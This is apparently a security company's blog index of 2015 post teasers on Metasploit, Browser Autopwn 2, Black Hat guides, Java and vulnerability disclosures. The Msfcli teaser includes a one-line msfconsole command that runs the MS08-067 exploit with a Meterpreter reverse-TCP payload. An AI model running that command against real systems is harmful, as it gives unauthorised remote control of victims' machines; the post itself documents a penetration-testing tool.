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6 min Metasploit

Interning at Rapid7: A "git push" in the Right Direction

How I Got Here Hey there! My name is Mo. I'm currently an intern here at Rapid7 working in the Austin office as part of the Metasploit team. If you came here expecting a deep understanding of Metasploit, this blog post isn't the right place. If you ARE interested in knowing what it's like to being a small town college student working at a leading firm in security engineering, then keep reading! Everyone used to tell me that every mistake and failure was a push in the right direction, but that

1 min Legal

Rapid7's Comments on the Wassenaar Arrangement Proposed Rule

For the past two months, the Department of Commerce's Bureau of Industry and Security (BIS) has been running a public consultation to solicit feedback on its proposal for implementing export controls for intrusion software under the Wassenaar Arrangement. You can read about the proposal and Rapid7's initial thoughts here . The consultation window closed on Monday, July 20th

3 min Metasploit Weekly Wrapup

Weekly Metasploit WrapUp: A Wild Committer Appears!

Browser Autopwn Version 2 Hey all! If you haven't been following the Metasploit development over the last few weeks, you know that we've been pretty busy getting Browser Autopwn Version 2 (BAPv2) out the door and into Metasploit Framework. This project was, and is, driven by our own beloved Wei _sinn3r Chen, and it's one of those projects around here that I'm really personally very excited about. If you want to jump into all the implementation details and history,

5 min Events

The Black Hat Attendee Guide Part 5 - Meaningful Introductions

If you are just joining us, this is the fifth post in the series starting here . Making An Introduction I might be wrong, but I'll argue that networking is a transitive verb, so ENGAGE! The real magic starts happening as you progress: * Level 1-- Start with a “Hi, my name is… ” Yes, it's that simple, thanks to Slim Shady * Level 2-- Demonstrate that you have an idea of the world the other person live

2 min IT Ops

Playing with Java 8's Completable Futures

Of the many additions to Java 8 such as the Stream API and lambdas , I noticed one of the lesser talked about ones was CompletableFutures . So I decided to have a play around with them on the last Java component I wrote. My use case in a nutshell was piping larg

1 min Patch Tuesday

Oracle Java JRE AES Intrinsics Remote Denial of Service (CVE-2015-2659)

Java 8 servers versions prior to u46 are susceptible to a remote unauthenticated denial of service (hard crash) when used with AES intrinsics (AES-NI) CPU extensions on supported processors. AES intrinsics are enabled by default on the Oracle JVM if the the JVM detects that processor capability, which is common for modern processors manufactured after 2010. For more on AES-NI, see the Wikipedia article . This issue was tracked in the OpenJDK p

6 min

The New Metasploit Browser Autopwn: Strikes Faster and Smarter - Part 2

Hello again, Welcome back! So yesterday we did an introduction about the brand new Browser Autopwn 2, if you have not read that, make sure to check it out . And today, let's talk about how to use it, what you can do with it for better vulnerability validation and penetration testing. As we explained in the previous blog post, Browser Autopwn 2 is a complete redesign from the firs

2 min

Patch Tuesday, July 2015

Administrators and security teams are in for a hectic week tackling 14 Microsoft security bulletins, 2 Adobe updates addressing 4 CVEs for Flash\Shockwave and Oracle has released their quarterly update for 63 of their product suites (including Java, Oracle DB, MySQL and Solaris). Of the 14 Microsoft security bulletins, 4 re

7 min Events

The Black Hat Attendee Guide Part 2 - The Briefings

If you are just joining us, this is the second post in the series starting here . Content is king. Research is what binds us, and you should not be surprised that some of the best in the game focus their annual research calendar on the Black Hat USA CFP. Offensive security research is the tail that wags the dog—many vendors and architects spend the year trying to get back in front of some of the bombs dropped at Black Hat each year. There's a

4 min

The New Metasploit Browser Autopwn: Strikes Faster and Smarter - Part 1

Hi everyone, Today, I'd like to debut a completely rewritten new cool toy for Metasploit: Browser Autopwn 2. Browser Autopwn is the easiest and quickest way to explicitly test browser vulnerabilities without having the user to painfully learn everything there is about each exploit and the remote target before deployment. In this blog post, I will provide an introduction on the tool. And then in my next one, I will explain how you can take advantage of it to maximize your vuln validation or pen

7 min

Web Application Security Scanning and the Art of Automation

A version of this blog was originally posted on Nov. 5, 2012. Few people fully appreciate the difficulty in creating a web application security scanner that can actually work well against most sites. In addition, there is much debate about how much application security testing can be automated and how much needs be done by human hands. Let's look at a recent conversation among some industry exp

3 min Events

The Black Hat Attendee Guide, Part 1 - How to Survive Black Hat

If you're like me, you have wanted to go to Black Hat for ages. If you're going, have a game plan. For first timers, this series will be a primer full of guidance and survival tips. For returning attendees, this will help maximize your experience at Black Hat. First, I want to give you perspective on my bias, coloring guidance offered here. My slant is that of someone who was a booth babe (sales engineer), a speaker, an attendee, Review Board member and former Gen

4 min Vulnerability Disclosure

R7-2015-08: Accellion File Transfer Appliance Vulnerabilities (CVE-2015-2856, CVE-2015-2857)

This disclosure covers two issues discovered with the Accellion File Transfer Appliance, a device used for secure enterprise file transfers. Issue R7-2015-08.1 is a remote file disclosure vulnerability, and issue R7-2015-08.2 is remote command execution vulnerability. Metasploit modules have been released for both issues, as of Pull Request 5694 . According to the vendor, both issues were addressed in version

1 min

Msfcli is No Longer Available in Metasploit

Hi everyone, This January, we made an announcement about the deprecation of Msfcli, the command line interface version for Metasploit. Today we are ready to say good-bye to it. Instead of Msfcli, we recommend using the -x option in Msfconsole. For example, here's how you can run MS08-067 in one line: ./msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST ; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ; run" You can also leverage things like resource scripts o

4 min IT Ops

Ditch the Debugger and Use Log Analysis Instead

This guest blog post is written by Matthew Skelton, Co-founder and Principal Consultant at Skelton Thatcher Consulting. -------------------------------------------------------------------------------- Summary: As a Developer, you cannot attach the debugger to your application in Production, but you can use logging in a way that helps you easily diagnose problems in both development AND Production. You also get to make friends with Operations people – win! The applications we’re developing and